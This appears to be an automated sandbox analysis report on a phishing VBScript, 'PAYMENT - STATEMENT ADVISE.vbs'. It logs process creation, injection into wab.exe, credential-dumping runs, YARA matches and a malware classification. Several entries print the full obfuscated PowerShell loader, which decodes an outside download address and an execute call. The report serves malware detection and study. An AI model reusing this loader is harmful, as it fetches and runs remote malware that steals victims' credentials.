Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers';If (${host}.CurrentCulture) {$kbspriserne++;}Function Charcuteries($Stamgster){$Papillons=$Stamgster.Length-$kbspriserne;$Laddered='SUBsTRI';$Laddered+='ng';For( $Tubelike193=7;$Tubelike193 -lt $Papillons;$Tubelike193+=8){$Recovers+=$Stamgster.$Laddered.Invoke( $Tubelike193, $kbspriserne);}$Recovers;}function Venerator($Strongbark56){ & ($Verdant) ($Strongbark56);}$Resina=Charcuteries 'Suldan,MUnconvioC,njugazAtionspiKursustlAabninglInseminaskuffel/Hebraic5Kontrol.Fumarat0Shi.lda kultur (Pt.lonoWSammensiTraitornP urisydMinellaoBrachetwSoyledfsGaddisw Forlng,NComma.iT Orient Ribleth1 P.trol0 Baulks. Skovhu0Voks.nu;.lobosi PseudocW Dolkesi PresennAmynodo6Brandsk4A savem;Unprote Skri lxSipling6 Ine,ha4 Cronet;Distrib Benz,nmrIdolakiv Assist:Claspin1Offentl2Sesambo1Frdiggr.Formumm0,verdis)S.eetin Oris.olGAuditr,eUsurpedcCond.nskHerman.oUdruste/ Ddsspr2wylingj0Brnegaa1Reveill0Tr,pone0Barnevo1Overneu0Uploop,1 Kultur HerlighFEndothei sickanrF,rfarse SvigtefBonendeoUvidglixTuttern/Abjudgi1Hospita2Wastryg1Hierarc.Overhea0.quabat ';$Swinburnian=Charcuteries 'LandsdkU ,treamsPres.deeStudie rReparat-Firk ntADriftspgBaba.akeRetroflnBallonot Mucige ';$Judaeophobia=Charcuteries ',dvalgsh GrumphtReboteltRigsmalp E tals: Udbasu/Boundle/ Felino1Slje,sr0 Sammen3Sta.let.Waterlo2Uncoagu3Cirrose7Agnersn.Naturfr8Burnets6Upro,uk. retfrd2Muticou4Int nda7 Tragic/Gal.ifoa,belfabcGiantnaiPenn sid,ndenhaiT,appeozSnderleeNic murs Medi.i.UnsensimGrikesas StyrtfoFinge,s ';$Tubelike193nsuetude=Charcuteries 'Intercl>precont ';$Verdant=Charcuteries 'PresanciM,rgarierobotizx e serc ';$Sultefden='paaskrev';$Electant = Charcuteries 'Pu.sigeekrumbencPi tsdihtestudioS,efuld W ggleh% inumssa AdultepRelandspdollargdAportlaa ,paanttCappucca Uty el%Placoph\FiskemeAPr vatin M.crobgKriminaiBulletmoKinlesssAppetispAsthmaseTvangstrRaastofmHyper.a.UsikkerAWin.berfWienervmCho,ine Vanarte&Tilsla,&Pestram TilbageSnafuincJusterihRekur ioUnculti Ranso ftAusc.lt ';Venerator (Charcuteries 'Plukfis$,ernekag Skaftel istteloScri.enbSlvt ssa SonatilVivendi:StokavsPXiphop,rUnempiraTenpou,eskruedesPrintertYawnproeOverplarOve,natnUnderkle JohanbsTrsti.e= U,admi( Brandsc Pro enm Bi.anhdepisarc Fiske e/ Anpa.tcNecessa Special$ Bl.dskEBadebuklOverla.e Stempec ongrestIdylliuaEnergiknAfhngectblaaste),ystifi ');Venerator (Charcuteries 'Dockhou$,egadyng M sreml Jump to behavior
Abnormal high CPU Usage
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process Stats: CPU usage > 49%
Contains functionality to call native functions
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 11_2_0040DD85
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00401806 NtdllDefWindowProc_W, 11_2_00401806
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_004018C0 NtdllDefWindowProc_W, 11_2_004018C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_004016FD NtdllDefWindowProc_A, 13_2_004016FD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_004017B7 NtdllDefWindowProc_A, 13_2_004017B7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00402CAC NtdllDefWindowProc_A, 14_2_00402CAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00402D66 NtdllDefWindowProc_A, 14_2_00402D66
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848F0BEA2 2_2_00007FF848F0BEA2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848F0B0F6 2_2_00007FF848F0B0F6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 8_2_240D7194 8_2_240D7194
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 8_2_240CB5C1 8_2_240CB5C1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0044B040 11_2_0044B040
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0043610D 11_2_0043610D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00447310 11_2_00447310
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0044A490 11_2_0044A490
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0040755A 11_2_0040755A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0043C560 11_2_0043C560
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0044B610 11_2_0044B610
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0044D6C0 11_2_0044D6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_004476F0 11_2_004476F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0044B870 11_2_0044B870
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0044081D 11_2_0044081D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00414957 11_2_00414957
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_004079EE 11_2_004079EE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00407AEB 11_2_00407AEB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0044AA80 11_2_0044AA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00412AA9 11_2_00412AA9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00404B74 11_2_00404B74
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00404B03 11_2_00404B03
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0044BBD8 11_2_0044BBD8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00404BE5 11_2_00404BE5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00404C76 11_2_00404C76
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00415CFE 11_2_00415CFE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00416D72 11_2_00416D72
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00446D30 11_2_00446D30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00446D8B 11_2_00446D8B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00406E8F 11_2_00406E8F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00405038 13_2_00405038
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0041208C 13_2_0041208C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_004050A9 13_2_004050A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0040511A 13_2_0040511A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0043C13A 13_2_0043C13A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_004051AB 13_2_004051AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00449300 13_2_00449300
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0040D322 13_2_0040D322
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0044A4F0 13_2_0044A4F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0043A5AB 13_2_0043A5AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00413631 13_2_00413631
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00446690 13_2_00446690
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0044A730 13_2_0044A730
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_004398D8 13_2_004398D8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_004498E0 13_2_004498E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0044A886 13_2_0044A886
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0043DA09 13_2_0043DA09
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00438D5E 13_2_00438D5E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00449ED0 13_2_00449ED0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0041FE83 13_2_0041FE83
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00430F54 13_2_00430F54
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_004050C2 14_2_004050C2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_004014AB 14_2_004014AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00405133 14_2_00405133
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_004051A4 14_2_004051A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00401246 14_2_00401246
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0040CA46 14_2_0040CA46
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00405235 14_2_00405235
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_004032C8 14_2_004032C8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00401689 14_2_00401689
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00402F60 14_2_00402F60
Found potential string decryption / allocating functions
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 004169A7 appears 87 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 0044DB70 appears 41 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 004165FF appears 35 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00422297 appears 42 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00444B5A appears 37 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00413025 appears 79 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00416760 appears 69 times
Java / VBScript file with very long strings (likely obfuscated code)
Source: PAYMENT - STATEMENT ADVISE.vbs Initial sample: Strings found which are bigger than 50
Yara signature match
Source: amsi32_1084.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3528, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 1084, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.phis.troj.spyw.expl.evad.winVBS@20/13@1/3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z, 11_2_004182CE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification, 14_2_00410DE1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z, 11_2_00418758
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,FindCloseChangeNotification, 11_2_00413D4C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy, 11_2_0040B58D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Angiosperm.Afm Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-VEYV6I
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1976:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eqdjamr5.rdk.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PAYMENT - STATEMENT ADVISE.vbs"
Source: C:\Program Files (x86)\Windows Mail\wab.exe System information queried: HandleInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3528
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1084
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: wab.exe Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: wab.exe Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: wab.exe, 00000008.00000002.3287311337.0000000024500000.00000040.10000000.00040000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: wab.exe Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: wab.exe Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: wab.exe Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: wab.exe Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: PAYMENT - STATEMENT ADVISE.vbs ReversingLabs: Detection: 37%
Source: PAYMENT - STATEMENT ADVISE.vbs Virustotal: Detection: 14%
Source: C:\Program Files (x86)\Windows Mail\wab.exe Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PAYMENT - STATEMENT ADVISE.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers';If (${host}.CurrentCulture) {$kbspriserne++;}Function Charcuteries($Stamgster){$Papillons=$Stamgster.Length-$kbspriserne;$Laddered='SUBsTRI';$Laddered+='ng';For( $Tubelike193=7;$Tubelike193 -lt $Papillons;$Tubelike193+=8){$Recovers+=$Stamgster.$Laddered.Invoke( $Tubelike193, $kbspriserne);}$Recovers;}function Venerator($Strongbark56){ & ($Verdant) ($Strongbark56);}$Resina=Charcuteries 'Suldan,MUnconvioC,njugazAtionspiKursustlAabninglInseminaskuffel/Hebraic5Kontrol.Fumarat0Shi.lda kultur (Pt.lonoWSammensiTraitornP urisydMinellaoBrachetwSoyledfsGaddisw Forlng,NComma.iT Orient Ribleth1 P.trol0 Baulks. Skovhu0Voks.nu;.lobosi PseudocW Dolkesi PresennAmynodo6Brandsk4A savem;Unprote Skri lxSipling6 Ine,ha4 Cronet;Distrib Benz,nmrIdolakiv Assist:Claspin1Offentl2Sesambo1Frdiggr.Formumm0,verdis)S.eetin Oris.olGAuditr,eUsurpedcCond.nskHerman.oUdruste/ Ddsspr2wylingj0Brnegaa1Reveill0Tr,pone0Barnevo1Overneu0Uploop,1 Kultur HerlighFEndothei sickanrF,rfarse SvigtefBonendeoUvidglixTuttern/Abjudgi1Hospita2Wastryg1Hierarc.Overhea0.quabat ';$Swinburnian=Charcuteries 'LandsdkU ,treamsPres.deeStudie rReparat-Firk ntADriftspgBaba.akeRetroflnBallonot Mucige ';$Judaeophobia=Charcuteries ',dvalgsh GrumphtReboteltRigsmalp E tals: Udbasu/Boundle/ Felino1Slje,sr0 Sammen3Sta.let.Waterlo2Uncoagu3Cirrose7Agnersn.Naturfr8Burnets6Upro,uk. retfrd2Muticou4Int nda7 Tragic/Gal.ifoa,belfabcGiantnaiPenn sid,ndenhaiT,appeozSnderleeNic murs Medi.i.UnsensimGrikesas StyrtfoFinge,s ';$Tubelike193nsuetude=Charcuteries 'Intercl>precont ';$Verdant=Charcuteries 'PresanciM,rgarierobotizx e serc ';$Sultefden='paaskrev';$Electant = Charcuteries 'Pu.sigeekrumbencPi tsdihtestudioS,efuld W ggleh% inumssa AdultepRelandspdollargdAportlaa ,paanttCappucca Uty el%Placoph\FiskemeAPr vatin M.crobgKriminaiBulletmoKinlesssAppetispAsthmaseTvangstrRaastofmHyper.a.UsikkerAWin.berfWienervmCho,ine Vanarte&Tilsla,&Pestram TilbageSnafuincJusterihRekur ioUnculti Ranso ftAusc.lt ';Venerator (Charcuteries 'Plukfis$,ernekag Skaftel istteloScri.enbSlvt ssa SonatilVivendi:StokavsPXiphop,rUnempiraTenpou,eskruedesPrintertYawnproeOverplarOve,natnUnderkle JohanbsTrsti.e= U,admi( Brandsc Pro enm Bi.anhdepisarc Fiske e/ Anpa.tcNecessa Special$ Bl.dskEBadebuklOverla.e Stempec ongrestIdylliuaEnergiknAfhngectblaaste),ystifi ');Venerator (Charcuteries 'Dockhou$,egadyng M sreml
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Angiosperm.Afm && echo t"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers';If (${host}.CurrentCulture) {$kbspriserne++;}Function Charcuteries($Stamgster){$Papillons=$Stamgster.Length-$kbspriserne;$Laddered='SUBsTRI';$Laddered+='ng';For( $Tubelike193=7;$Tubelike193 -lt $Papillons;$Tubelike193+=8){$Recovers+=$Stamgster.$Laddered.Invoke( $Tubelike193, $kbspriserne);}$Recovers;}function Venerator($Strongbark56){ & ($Verdant) ($Strongbark56);}$Resina=Charcuteries 'Suldan,MUnconvioC,njugazAtionspiKursustlAabninglInseminaskuffel/Hebraic5Kontrol.Fumarat0Shi.lda kultur (Pt.lonoWSammensiTraitornP urisydMinellaoBrachetwSoyledfsGaddisw Forlng,NComma.iT Orient Ribleth1 P.trol0 Baulks. Skovhu0Voks.nu;.lobosi PseudocW Dolkesi PresennAmynodo6Brandsk4A savem;Unprote Skri lxSipling6 Ine,ha4 Cronet;Distrib Benz,nmrIdolakiv Assist:Claspin1Offentl2Sesambo1Frdiggr.Formumm0,verdis)S.eetin Oris.olGAuditr,eUsurpedcCond.nskHerman.oUdruste/ Ddsspr2wylingj0Brnegaa1Reveill0Tr,pone0Barnevo1Overneu0Uploop,1 Kultur HerlighFEndothei sickanrF,rfarse SvigtefBonendeoUvidglixTuttern/Abjudgi1Hospita2Wastryg1Hierarc.Overhea0.quabat ';$Swinburnian=Charcuteries 'LandsdkU ,treamsPres.deeStudie rReparat-Firk ntADriftspgBaba.akeRetroflnBallonot Mucige ';$Judaeophobia=Charcuteries ',dvalgsh GrumphtReboteltRigsmalp E tals: Udbasu/Boundle/ Felino1Slje,sr0 Sammen3Sta.let.Waterlo2Uncoagu3Cirrose7Agnersn.Naturfr8Burnets6Upro,uk. retfrd2Muticou4Int nda7 Tragic/Gal.ifoa,belfabcGiantnaiPenn sid,ndenhaiT,appeozSnderleeNic murs Medi.i.UnsensimGrikesas StyrtfoFinge,s ';$Tubelike193nsuetude=Charcuteries 'Intercl>precont ';$Verdant=Charcuteries 'PresanciM,rgarierobotizx e serc ';$Sultefden='paaskrev';$Electant = Charcuteries 'Pu.sigeekrumbencPi tsdihtestudioS,efuld W ggleh% inumssa AdultepRelandspdollargdAportlaa ,paanttCappucca Uty el%Placoph\FiskemeAPr vatin M.crobgKriminaiBulletmoKinlesssAppetispAsthmaseTvangstrRaastofmHyper.a.UsikkerAWin.berfWienervmCho,ine Vanarte&Tilsla,&Pestram TilbageSnafuincJusterihRekur ioUnculti Ranso ftAusc.lt ';Venerator (Charcuteries 'Plukfis$,ernekag Skaftel istteloScri.enbSlvt ssa SonatilVivendi:StokavsPXiphop,rUnempiraTenpou,eskruedesPrintertYawnproeOverplarOve,natnUnderkle JohanbsTrsti.e= U,admi( Brandsc Pro enm Bi.anhdepisarc Fiske e/ Anpa.tcNecessa Special$ Bl.dskEBadebuklOverla.e Stempec ongrestIdylliuaEnergiknAfhngectblaaste),ystifi ');Venerator (Charcuteries 'Dockhou$,egadyng M sreml
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Angiosperm.Afm && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ugtgkmvnmbilkeinjrrnqjhzionvtufj"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xahrl"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xahrl"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\humjlxyi"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers';If (${host}.CurrentCulture) {$kbspriserne++;}Function Charcuteries($Stamgster){$Papillons=$Stamgster.Length-$kbspriserne;$Laddered='SUBsTRI';$Laddered+='ng';For( $Tubelike193=7;$Tubelike193 -lt $Papillons;$Tubelike193+=8){$Recovers+=$Stamgster.$Laddered.Invoke( $Tubelike193, $kbspriserne);}$Recovers;}function Venerator($Strongbark56){ & ($Verdant) ($Strongbark56);}$Resina=Charcuteries 'Suldan,MUnconvioC,njugazAtionspiKursustlAabninglInseminaskuffel/Hebraic5Kontrol.Fumarat0Shi.lda kultur (Pt.lonoWSammensiTraitornP urisydMinellaoBrachetwSoyledfsGaddisw Forlng,NComma.iT Orient Ribleth1 P.trol0 Baulks. Skovhu0Voks.nu;.lobosi PseudocW Dolkesi PresennAmynodo6Brandsk4A savem;Unprote Skri lxSipling6 Ine,ha4 Cronet;Distrib Benz,nmrIdolakiv Assist:Claspin1Offentl2Sesambo1Frdiggr.Formumm0,verdis)S.eetin Oris.olGAuditr,eUsurpedcCond.nskHerman.oUdruste/ Ddsspr2wylingj0Brnegaa1Reveill0Tr,pone0Barnevo1Overneu0Uploop,1 Kultur HerlighFEndothei sickanrF,rfarse SvigtefBonendeoUvidglixTuttern/Abjudgi1Hospita2Wastryg1Hierarc.Overhea0.quabat ';$Swinburnian=Charcuteries 'LandsdkU ,treamsPres.deeStudie rReparat-Firk ntADriftspgBaba.akeRetroflnBallonot Mucige ';$Judaeophobia=Charcuteries ',dvalgsh GrumphtReboteltRigsmalp E tals: Udbasu/Boundle/ Felino1Slje,sr0 Sammen3Sta.let.Waterlo2Uncoagu3Cirrose7Agnersn.Naturfr8Burnets6Upro,uk. retfrd2Muticou4Int nda7 Tragic/Gal.ifoa,belfabcGiantnaiPenn sid,ndenhaiT,appeozSnderleeNic murs Medi.i.UnsensimGrikesas StyrtfoFinge,s ';$Tubelike193nsuetude=Charcuteries 'Intercl>precont ';$Verdant=Charcuteries 'PresanciM,rgarierobotizx e serc ';$Sultefden='paaskrev';$Electant = Charcuteries 'Pu.sigeekrumbencPi tsdihtestudioS,efuld W ggleh% inumssa AdultepRelandspdollargdAportlaa ,paanttCappucca Uty el%Placoph\FiskemeAPr vatin M.crobgKriminaiBulletmoKinlesssAppetispAsthmaseTvangstrRaastofmHyper.a.UsikkerAWin.berfWienervmCho,ine Vanarte&Tilsla,&Pestram TilbageSnafuincJusterihRekur ioUnculti Ranso ftAusc.lt ';Venerator (Charcuteries 'Plukfis$,ernekag Skaftel istteloScri.enbSlvt ssa SonatilVivendi:StokavsPXiphop,rUnempiraTenpou,eskruedesPrintertYawnproeOverplarOve,natnUnderkle JohanbsTrsti.e= U,admi( Brandsc Pro enm Bi.anhdepisarc Fiske e/ Anpa.tcNecessa 